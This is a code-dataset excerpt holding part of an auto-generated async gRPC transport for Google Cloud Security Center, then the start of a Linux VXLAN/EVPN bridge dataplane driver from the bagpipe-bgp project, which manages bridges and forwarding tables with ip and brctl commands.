        self._ssl_channel_credentials = ssl_channel_credentials
        # Per-instance stub cache; shadows the class-level declaration.
        self._stubs: Dict[str, Callable] = {}
        self._operations_client = None
        if api_mtls_endpoint:
            warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
        if client_cert_source:
            warnings.warn("client_cert_source is deprecated", DeprecationWarning)
        if channel:
            # Ignore credentials if a channel was passed.
            credentials = False
            # If a channel was explicitly provided, set it.
            self._grpc_channel = channel
            self._ssl_channel_credentials = None
        else:
            if api_mtls_endpoint:
                host = api_mtls_endpoint
                # Create SSL credentials with client_cert_source or application
                # default SSL credentials.
                if client_cert_source:
                    cert, key = client_cert_source()
                    self._ssl_channel_credentials = grpc.ssl_channel_credentials(
                        certificate_chain=cert, private_key=key
                    )
                else:
                    self._ssl_channel_credentials = SslCredentials().ssl_credentials
            else:
                if client_cert_source_for_mtls and not ssl_channel_credentials:
                    cert, key = client_cert_source_for_mtls()
                    self._ssl_channel_credentials = grpc.ssl_channel_credentials(
                        certificate_chain=cert, private_key=key
                    )
        # The base transport sets the host, credentials and scopes
        super().__init__(
            host=host,
            credentials=credentials,
            credentials_file=credentials_file,
            scopes=scopes,
            quota_project_id=quota_project_id,
            client_info=client_info,
        )
        if not self._grpc_channel:
            self._grpc_channel = type(self).create_channel(
                self._host,
                credentials=self._credentials,
                credentials_file=credentials_file,
                scopes=self._scopes,
                ssl_credentials=self._ssl_channel_credentials,
                quota_project_id=quota_project_id,
                # -1 removes gRPC's default caps on message sizes.
                options=[
                    ("grpc.max_send_message_length", -1),
                    ("grpc.max_receive_message_length", -1),
                ],
            )
        # Wrap messages. This must be done after self._grpc_channel exists
        self._prep_wrapped_messages(client_info)
    @property
    def grpc_channel(self) -> aio.Channel:
        """Create the channel designed to connect to this service.
        This property caches on the instance; repeated calls return
        the same channel.
        """
        # Return the channel from cache.
        return self._grpc_channel
    @property
    def operations_client(self) -> operations_v1.OperationsAsyncClient:
        """Create the client designed to process long-running operations.
        This property caches on the instance; repeated calls return the same
        client.
        """
        # Sanity check: Only create a new client if we do not already have one.
        if self._operations_client is None:
            self._operations_client = operations_v1.OperationsAsyncClient(
                self.grpc_channel
            )
        # Return the client from cache.
        return self._operations_client
    @property
    def create_source(self) -> Callable[
            [securitycenter_service.CreateSourceRequest],
            Awaitable[gcs_source.Source]]:
        r"""Return a callable for the create source method over gRPC.
        Creates a source.
        Returns:
            Callable[[~.CreateSourceRequest],
                    Awaitable[~.Source]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'create_source' not in self._stubs:
            self._stubs['create_source'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/CreateSource',
                request_serializer=securitycenter_service.CreateSourceRequest.serialize,
                response_deserializer=gcs_source.Source.deserialize,
            )
        return self._stubs['create_source']
    @property
    def create_finding(self) -> Callable[
            [securitycenter_service.CreateFindingRequest],
            Awaitable[gcs_finding.Finding]]:
        r"""Return a callable for the create finding method over gRPC.
        Creates a finding. The corresponding source must
        exist for finding creation to succeed.
        Returns:
            Callable[[~.CreateFindingRequest],
                    Awaitable[~.Finding]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'create_finding' not in self._stubs:
            self._stubs['create_finding'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/CreateFinding',
                request_serializer=securitycenter_service.CreateFindingRequest.serialize,
                response_deserializer=gcs_finding.Finding.deserialize,
            )
        return self._stubs['create_finding']
    @property
    def create_notification_config(self) -> Callable[
            [securitycenter_service.CreateNotificationConfigRequest],
            Awaitable[gcs_notification_config.NotificationConfig]]:
        r"""Return a callable for the create notification config method over gRPC.
        Creates a notification config.
        Returns:
            Callable[[~.CreateNotificationConfigRequest],
                    Awaitable[~.NotificationConfig]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'create_notification_config' not in self._stubs:
            self._stubs['create_notification_config'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/CreateNotificationConfig',
                request_serializer=securitycenter_service.CreateNotificationConfigRequest.serialize,
                response_deserializer=gcs_notification_config.NotificationConfig.deserialize,
            )
        return self._stubs['create_notification_config']
    @property
    def delete_notification_config(self) -> Callable[
            [securitycenter_service.DeleteNotificationConfigRequest],
            Awaitable[empty.Empty]]:
        r"""Return a callable for the delete notification config method over gRPC.
        Deletes a notification config.
        Returns:
            Callable[[~.DeleteNotificationConfigRequest],
                    Awaitable[~.Empty]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'delete_notification_config' not in self._stubs:
            self._stubs['delete_notification_config'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/DeleteNotificationConfig',
                request_serializer=securitycenter_service.DeleteNotificationConfigRequest.serialize,
                response_deserializer=empty.Empty.FromString,
            )
        return self._stubs['delete_notification_config']
    @property
    def get_iam_policy(self) -> Callable[
            [iam_policy.GetIamPolicyRequest],
            Awaitable[giv_policy.Policy]]:
        r"""Return a callable for the get iam policy method over gRPC.
        Gets the access control policy on the specified
        Source.
        Returns:
            Callable[[~.GetIamPolicyRequest],
                    Awaitable[~.Policy]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'get_iam_policy' not in self._stubs:
            self._stubs['get_iam_policy'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/GetIamPolicy',
                # IAM types are plain protobuf messages (no proto-plus
                # wrapper), hence SerializeToString/FromString here.
                request_serializer=iam_policy.GetIamPolicyRequest.SerializeToString,
                response_deserializer=giv_policy.Policy.FromString,
            )
        return self._stubs['get_iam_policy']
    @property
    def get_notification_config(self) -> Callable[
            [securitycenter_service.GetNotificationConfigRequest],
            Awaitable[notification_config.NotificationConfig]]:
        r"""Return a callable for the get notification config method over gRPC.
        Gets a notification config.
        Returns:
            Callable[[~.GetNotificationConfigRequest],
                    Awaitable[~.NotificationConfig]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'get_notification_config' not in self._stubs:
            self._stubs['get_notification_config'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/GetNotificationConfig',
                request_serializer=securitycenter_service.GetNotificationConfigRequest.serialize,
                response_deserializer=notification_config.NotificationConfig.deserialize,
            )
        return self._stubs['get_notification_config']
    @property
    def get_organization_settings(self) -> Callable[
            [securitycenter_service.GetOrganizationSettingsRequest],
            Awaitable[organization_settings.OrganizationSettings]]:
        r"""Return a callable for the get organization settings method over gRPC.
        Gets the settings for an organization.
        Returns:
            Callable[[~.GetOrganizationSettingsRequest],
                    Awaitable[~.OrganizationSettings]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'get_organization_settings' not in self._stubs:
            self._stubs['get_organization_settings'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/GetOrganizationSettings',
                request_serializer=securitycenter_service.GetOrganizationSettingsRequest.serialize,
                response_deserializer=organization_settings.OrganizationSettings.deserialize,
            )
        return self._stubs['get_organization_settings']
    @property
    def get_source(self) -> Callable[
            [securitycenter_service.GetSourceRequest],
            Awaitable[source.Source]]:
        r"""Return a callable for the get source method over gRPC.
        Gets a source.
        Returns:
            Callable[[~.GetSourceRequest],
                    Awaitable[~.Source]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'get_source' not in self._stubs:
            self._stubs['get_source'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/GetSource',
                request_serializer=securitycenter_service.GetSourceRequest.serialize,
                response_deserializer=source.Source.deserialize,
            )
        return self._stubs['get_source']
    @property
    def group_assets(self) -> Callable[
            [securitycenter_service.GroupAssetsRequest],
            Awaitable[securitycenter_service.GroupAssetsResponse]]:
        r"""Return a callable for the group assets method over gRPC.
        Filters an organization's assets and groups them by
        their specified properties.
        Returns:
            Callable[[~.GroupAssetsRequest],
                    Awaitable[~.GroupAssetsResponse]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'group_assets' not in self._stubs:
            self._stubs['group_assets'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/GroupAssets',
                request_serializer=securitycenter_service.GroupAssetsRequest.serialize,
                response_deserializer=securitycenter_service.GroupAssetsResponse.deserialize,
            )
        return self._stubs['group_assets']
    @property
    def group_findings(self) -> Callable[
            [securitycenter_service.GroupFindingsRequest],
            Awaitable[securitycenter_service.GroupFindingsResponse]]:
        r"""Return a callable for the group findings method over gRPC.
        Filters an organization or source's findings and groups them by
        their specified properties.
        To group across all sources provide a ``-`` as the source id.
        Example:
        /v1p1beta1/organizations/{organization_id}/sources/-/findings
        Returns:
            Callable[[~.GroupFindingsRequest],
                    Awaitable[~.GroupFindingsResponse]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'group_findings' not in self._stubs:
            self._stubs['group_findings'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/GroupFindings',
                request_serializer=securitycenter_service.GroupFindingsRequest.serialize,
                response_deserializer=securitycenter_service.GroupFindingsResponse.deserialize,
            )
        return self._stubs['group_findings']
    @property
    def list_assets(self) -> Callable[
            [securitycenter_service.ListAssetsRequest],
            Awaitable[securitycenter_service.ListAssetsResponse]]:
        r"""Return a callable for the list assets method over gRPC.
        Lists an organization's assets.
        Returns:
            Callable[[~.ListAssetsRequest],
                    Awaitable[~.ListAssetsResponse]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'list_assets' not in self._stubs:
            self._stubs['list_assets'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/ListAssets',
                request_serializer=securitycenter_service.ListAssetsRequest.serialize,
                response_deserializer=securitycenter_service.ListAssetsResponse.deserialize,
            )
        return self._stubs['list_assets']
    @property
    def list_findings(self) -> Callable[
            [securitycenter_service.ListFindingsRequest],
            Awaitable[securitycenter_service.ListFindingsResponse]]:
        r"""Return a callable for the list findings method over gRPC.
        Lists an organization or source's findings.
        To list across all sources provide a ``-`` as the source id.
        Example:
        /v1p1beta1/organizations/{organization_id}/sources/-/findings
        Returns:
            Callable[[~.ListFindingsRequest],
                    Awaitable[~.ListFindingsResponse]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'list_findings' not in self._stubs:
            self._stubs['list_findings'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/ListFindings',
                request_serializer=securitycenter_service.ListFindingsRequest.serialize,
                response_deserializer=securitycenter_service.ListFindingsResponse.deserialize,
            )
        return self._stubs['list_findings']
    @property
    def list_notification_configs(self) -> Callable[
            [securitycenter_service.ListNotificationConfigsRequest],
            Awaitable[securitycenter_service.ListNotificationConfigsResponse]]:
        r"""Return a callable for the list notification configs method over gRPC.
        Lists notification configs.
        Returns:
            Callable[[~.ListNotificationConfigsRequest],
                    Awaitable[~.ListNotificationConfigsResponse]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'list_notification_configs' not in self._stubs:
            self._stubs['list_notification_configs'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/ListNotificationConfigs',
                request_serializer=securitycenter_service.ListNotificationConfigsRequest.serialize,
                response_deserializer=securitycenter_service.ListNotificationConfigsResponse.deserialize,
            )
        return self._stubs['list_notification_configs']
    @property
    def list_sources(self) -> Callable[
            [securitycenter_service.ListSourcesRequest],
            Awaitable[securitycenter_service.ListSourcesResponse]]:
        r"""Return a callable for the list sources method over gRPC.
        Lists all sources belonging to an organization.
        Returns:
            Callable[[~.ListSourcesRequest],
                    Awaitable[~.ListSourcesResponse]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'list_sources' not in self._stubs:
            self._stubs['list_sources'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/ListSources',
                request_serializer=securitycenter_service.ListSourcesRequest.serialize,
                response_deserializer=securitycenter_service.ListSourcesResponse.deserialize,
            )
        return self._stubs['list_sources']
    @property
    def run_asset_discovery(self) -> Callable[
            [securitycenter_service.RunAssetDiscoveryRequest],
            Awaitable[operations.Operation]]:
        r"""Return a callable for the run asset discovery method over gRPC.
        Runs asset discovery. The discovery is tracked with a
        long-running operation.
        This API can only be called with limited frequency for an
        organization. If it is called too frequently the caller will
        receive a TOO_MANY_REQUESTS error.
        Returns:
            Callable[[~.RunAssetDiscoveryRequest],
                    Awaitable[~.Operation]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'run_asset_discovery' not in self._stubs:
            self._stubs['run_asset_discovery'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/RunAssetDiscovery',
                request_serializer=securitycenter_service.RunAssetDiscoveryRequest.serialize,
                response_deserializer=operations.Operation.FromString,
            )
        return self._stubs['run_asset_discovery']
    @property
    def set_finding_state(self) -> Callable[
            [securitycenter_service.SetFindingStateRequest],
            Awaitable[finding.Finding]]:
        r"""Return a callable for the set finding state method over gRPC.
        Updates the state of a finding.
        Returns:
            Callable[[~.SetFindingStateRequest],
                    Awaitable[~.Finding]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'set_finding_state' not in self._stubs:
            self._stubs['set_finding_state'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/SetFindingState',
                request_serializer=securitycenter_service.SetFindingStateRequest.serialize,
                response_deserializer=finding.Finding.deserialize,
            )
        return self._stubs['set_finding_state']
    @property
    def set_iam_policy(self) -> Callable[
            [iam_policy.SetIamPolicyRequest],
            Awaitable[giv_policy.Policy]]:
        r"""Return a callable for the set iam policy method over gRPC.
        Sets the access control policy on the specified
        Source.
        Returns:
            Callable[[~.SetIamPolicyRequest],
                    Awaitable[~.Policy]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'set_iam_policy' not in self._stubs:
            self._stubs['set_iam_policy'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/SetIamPolicy',
                request_serializer=iam_policy.SetIamPolicyRequest.SerializeToString,
                response_deserializer=giv_policy.Policy.FromString,
            )
        return self._stubs['set_iam_policy']
    @property
    def test_iam_permissions(self) -> Callable[
            [iam_policy.TestIamPermissionsRequest],
            Awaitable[iam_policy.TestIamPermissionsResponse]]:
        r"""Return a callable for the test iam permissions method over gRPC.
        Returns the permissions that a caller has on the
        specified source.
        Returns:
            Callable[[~.TestIamPermissionsRequest],
                    Awaitable[~.TestIamPermissionsResponse]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'test_iam_permissions' not in self._stubs:
            self._stubs['test_iam_permissions'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/TestIamPermissions',
                request_serializer=iam_policy.TestIamPermissionsRequest.SerializeToString,
                response_deserializer=iam_policy.TestIamPermissionsResponse.FromString,
            )
        return self._stubs['test_iam_permissions']
    @property
    def update_finding(self) -> Callable[
            [securitycenter_service.UpdateFindingRequest],
            Awaitable[gcs_finding.Finding]]:
        r"""Return a callable for the update finding method over gRPC.
        Creates or updates a finding. The corresponding
        source must exist for a finding creation to succeed.
        Returns:
            Callable[[~.UpdateFindingRequest],
                    Awaitable[~.Finding]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'update_finding' not in self._stubs:
            self._stubs['update_finding'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/UpdateFinding',
                request_serializer=securitycenter_service.UpdateFindingRequest.serialize,
                response_deserializer=gcs_finding.Finding.deserialize,
            )
        return self._stubs['update_finding']
    @property
    def update_notification_config(self) -> Callable[
            [securitycenter_service.UpdateNotificationConfigRequest],
            Awaitable[gcs_notification_config.NotificationConfig]]:
        r"""Return a callable for the update notification config method over gRPC.
        Updates a notification config. The following update fields are
        allowed: description, pubsub_topic, streaming_config.filter
        Returns:
            Callable[[~.UpdateNotificationConfigRequest],
                    Awaitable[~.NotificationConfig]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'update_notification_config' not in self._stubs:
            self._stubs['update_notification_config'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/UpdateNotificationConfig',
                request_serializer=securitycenter_service.UpdateNotificationConfigRequest.serialize,
                response_deserializer=gcs_notification_config.NotificationConfig.deserialize,
            )
        return self._stubs['update_notification_config']
    @property
    def update_organization_settings(self) -> Callable[
            [securitycenter_service.UpdateOrganizationSettingsRequest],
            Awaitable[gcs_organization_settings.OrganizationSettings]]:
        r"""Return a callable for the update organization settings method over gRPC.
        Updates an organization's settings.
        Returns:
            Callable[[~.UpdateOrganizationSettingsRequest],
                    Awaitable[~.OrganizationSettings]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'update_organization_settings' not in self._stubs:
            self._stubs['update_organization_settings'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/UpdateOrganizationSettings',
                request_serializer=securitycenter_service.UpdateOrganizationSettingsRequest.serialize,
                response_deserializer=gcs_organization_settings.OrganizationSettings.deserialize,
            )
        return self._stubs['update_organization_settings']
    @property
    def update_source(self) -> Callable[
            [securitycenter_service.UpdateSourceRequest],
            Awaitable[gcs_source.Source]]:
        r"""Return a callable for the update source method over gRPC.
        Updates a source.
        Returns:
            Callable[[~.UpdateSourceRequest],
                    Awaitable[~.Source]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'update_source' not in self._stubs:
            self._stubs['update_source'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/UpdateSource',
                request_serializer=securitycenter_service.UpdateSourceRequest.serialize,
                response_deserializer=gcs_source.Source.deserialize,
            )
        return self._stubs['update_source']
    @property
    def update_security_marks(self) -> Callable[
            [securitycenter_service.UpdateSecurityMarksRequest],
            Awaitable[gcs_security_marks.SecurityMarks]]:
        r"""Return a callable for the update security marks method over gRPC.
        Updates security marks.
        Returns:
            Callable[[~.UpdateSecurityMarksRequest],
                    Awaitable[~.SecurityMarks]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if 'update_security_marks' not in self._stubs:
            self._stubs['update_security_marks'] = self.grpc_channel.unary_unary(
                '/google.cloud.securitycenter.v1p1beta1.SecurityCenter/UpdateSecurityMarks',
                request_serializer=securitycenter_service.UpdateSecurityMarksRequest.serialize,
                response_deserializer=gcs_security_marks.SecurityMarks.deserialize,
            )
        return self._stubs['update_security_marks']
# Public API of this module.
__all__ = (
    'SecurityCenterGrpcAsyncIOTransport',
)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
72985b6e699ed82ff22ee8a2afdb80209e328897 | 7a431bf2a221a9b06a7239e6190c66a7de9b9b87 | /bagpipe/bgp/vpn/evpn/linux_vxlan.py | 0dcc7a7dc8a8d42f9c6691ac3ca9f628eadf0c60 | [
"BSD-3-Clause",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | matrohon/bagpipe-bgp | c7bbe84d17d6e3838fef1a00616ba76a31fc96f6 | e0366ea14d3775106e6a4e11bce273647b936071 | refs/heads/master | 2020-12-14T08:50:55.223325 | 2016-03-09T16:59:54 | 2016-03-09T16:59:54 | 33,677,374 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,750 | py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# encoding: utf-8
# Copyright 2014 Orange
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from distutils.version import StrictVersion
from bagpipe.bgp.common import logDecorator
from bagpipe.bgp.common.run_command import runCommand
from bagpipe.bgp.common.looking_glass import LookingGlassLocalLogger
from bagpipe.bgp.vpn.evpn import VPNInstanceDataplane
from bagpipe.bgp.vpn.dataplane_drivers import DataplaneDriver
from bagpipe.exabgp.message.update.attribute.communities import Encapsulation
BRIDGE_NAME_PREFIX = "evpn---"
VXLAN_INTERFACE_PREFIX = "vxlan--"
LINUX_DEV_LEN = 14
class LinuxVXLANEVIDataplane(VPNInstanceDataplane):
    def __init__(self, *args, **kwargs):
        # Set up the per-EVI dataplane: pick (or derive) the Linux bridge
        # name, create the bridge if it does not exist yet, and plug the
        # EVI's VXLAN interface into it.
        VPNInstanceDataplane.__init__(self, *args)
        # An externally managed bridge may be supplied via 'linuxbr';
        # otherwise the name is derived from the external instance id and
        # truncated to fit the kernel's interface-name length limit.
        if 'linuxbr' in kwargs:
            self.bridge_name = kwargs.get('linuxbr')
        else:
            self.bridge_name = (
                BRIDGE_NAME_PREFIX + self.externalInstanceId)[:LINUX_DEV_LEN]
        self.vxlan_if_name = (
            VXLAN_INTERFACE_PREFIX + self.externalInstanceId)[:LINUX_DEV_LEN]
        self.log.info("EVI %d: Initializing bridge %s",
                      self.instanceId, self.bridge_name)
        if not self._interface_exists(self.bridge_name):
            self.log.debug("Starting bridge %s", self.bridge_name)
            # Create bridge; forwarding delay 0 and STP off so ports start
            # forwarding immediately.
            self._runCommand("brctl addbr %s" % self.bridge_name)
            self._runCommand("brctl setfd %s 0" % self.bridge_name)
            self._runCommand("brctl stp %s off" % self.bridge_name)
            self._runCommand("ip link set %s up" % self.bridge_name)
            self.log.debug("Bridge %s created", self.bridge_name)
        self._create_and_plug_vxlan_if()
        self.log.debug("VXLAN interface %s plugged on bridge %s",
                       self.vxlan_if_name, self.bridge_name)
        self._cleaningUp = False
    @logDecorator.logInfo
    def cleanup(self):
        # Tear down this EVI's dataplane: remove the VXLAN interface and,
        # when the bridge was created by this driver, delete the bridge too.
        self.log.info("Cleaning EVI bridge and VXLAN interface %s",
                      self.bridge_name)
        self._cleaningUp = True
        self._cleanup_vxlan_if()
        # Delete only EVPN Bridge (Created by dataplane driver)
        # NOTE(review): this is a substring test, not a prefix test -- an
        # externally supplied bridge name containing "evpn---" would also
        # be deleted; confirm whether startswith() was intended.
        if BRIDGE_NAME_PREFIX in self.bridge_name:
            self._runCommand("ip link set %s down" %
                             self.bridge_name, raiseExceptionOnError=False)
            self._runCommand("brctl delbr %s" %
                             self.bridge_name, raiseExceptionOnError=False)
def _create_and_plug_vxlan_if(self):
self.log.debug("Creating and plugging VXLAN interface %s",
self.vxlan_if_name)
if self._interface_exists(self.vxlan_if_name):
self._remove_vxlan_if()
dstPortSpec = ""
if self.driver.vxlanDestPort:
dstPortSpec = "dstport %d" % self.driver.vxlanDestPort
# Create VXLAN interface
self._runCommand(
"ip link add %s type vxlan id %d local %s nolearning proxy %s" %
(self.vxlan_if_name, self.instanceLabel,
self.driver.getLocalAddress(), dstPortSpec)
)
self._runCommand("ip link set %s up" % self.vxlan_if_name)
# Plug VXLAN interface into bridge
self._runCommand("brctl addif %s %s" % (self.bridge_name,
self.vxlan_if_name))
def _cleanup_vxlan_if(self):
if self._is_vxlan_if_on_bridge():
# Unplug VXLAN interface from Linux bridge
self._unplug_from_bridge(self.vxlan_if_name)
self._remove_vxlan_if()
def _remove_vxlan_if(self):
# Remove VXLAN interface
self._runCommand("ip link set %s down" % self.vxlan_if_name)
self._runCommand("ip link del %s" % self.vxlan_if_name)
def _is_vxlan_if_on_bridge(self):
(output, _) = self._runCommand(
"brctl show %s | grep '%s' | sed -e 's/\s\+//g'" %
(self.bridge_name, VXLAN_INTERFACE_PREFIX))
return True if (output == self.vxlan_if_name) else False
def _interface_exists(self, interface):
"""Check if interface exists."""
(_, exitCode) = self._runCommand("ip link show dev %s" % interface,
raiseExceptionOnError=False,
acceptableReturnCodes=[-1])
return (exitCode == 0)
def _unplug_from_bridge(self, interface):
if self._interface_exists(self.bridge_name):
self._runCommand("brctl delif %s %s" %
(self.bridge_name, interface),
acceptableReturnCodes=[0, 1])
def setGatewayPort(self, linuxif):
gw_ip = self.gatewayIP
gw_mac = "01:00:00:00:00:00" # FIXME
self._runCommand("brctl addif %s %s" %
(self.bridge_name, linuxif),
raiseExceptionOnError=False)
self._runCommand("bridge fdb replace %s dev %s" %
(gw_mac, linuxif))
self._runCommand(
"ip neighbor replace %s lladdr %s dev %s nud permanent" %
(gw_ip, gw_mac, linuxif)
)
def gatewayPortDown(self, linuxif):
self._runCommand("brctl delif %s %s" %
(self.bridge_name, linuxif),
raiseExceptionOnError=False)
# TODO: need to cleanup bridge fdb and ip neigh ?
def setBridgeName(self, linuxbr):
self.bridge_name = linuxbr
@logDecorator.logInfo
def vifPlugged(self, macAddress, ipAddress, localPort, label):
# Plug localPort only into EVPN bridge (Created by dataplane driver)
if BRIDGE_NAME_PREFIX in self.bridge_name:
self.log.debug("Plugging localPort %s into EVPN bridge %s",
localPort['linuxif'], self.bridge_name)
self._runCommand("brctl addif %s %s" %
(self.bridge_name, localPort['linuxif']),
raiseExceptionOnError=False)
@logDecorator.logInfo
def vifUnplugged(self, macAddress, ipAddress, localPort, label,
lastEndpoint=True):
# Unplug localPort only from EVPN bridge (Created by dataplane driver)
if BRIDGE_NAME_PREFIX in self.bridge_name:
self.log.debug("Unplugging localPort %s from EVPN bridge %s",
localPort['linuxif'], self.bridge_name)
self._unplug_from_bridge(localPort['linuxif'])
@logDecorator.log
def setupDataplaneForRemoteEndpoint(self, prefix, remotePE, label, nlri,
encaps):
if self._cleaningUp:
self.log.debug("setupDataplaneForRemoteEndpoint: instance cleaning"
" up, do nothing")
return
mac = prefix
ip = nlri.ip
vni = label
# populate bridge forwarding db
self._runCommand("bridge fdb replace %s dev %s dst %s vni %s" %
(mac, self.vxlan_if_name, remotePE, vni))
# populate ARP cache
if ip is not None:
self._runCommand("ip neighbor replace %s lladdr %s dev %s nud "
"permanent" % (ip, mac, self.vxlan_if_name))
else:
self.log.warning("No IP in E-VPN route, ARP will not work for this"
"IP/MAC")
self._fdbDump()
@logDecorator.log
def removeDataplaneForRemoteEndpoint(self, prefix, remotePE, label, nlri):
if self._cleaningUp:
self.log.debug("setupDataplaneForRemoteEndpoint: instance cleaning"
" up, do nothing")
return
mac = prefix
ip = nlri.ip
vni = label
self._fdbDump()
self._runCommand("ip neighbor del %s lladdr %s dev %s nud permanent" %
(ip, mac, self.vxlan_if_name))
self._runCommand("bridge fdb del %s dev %s dst %s vni %s" %
(mac, self.vxlan_if_name, remotePE, vni))
self._fdbDump()
@logDecorator.log
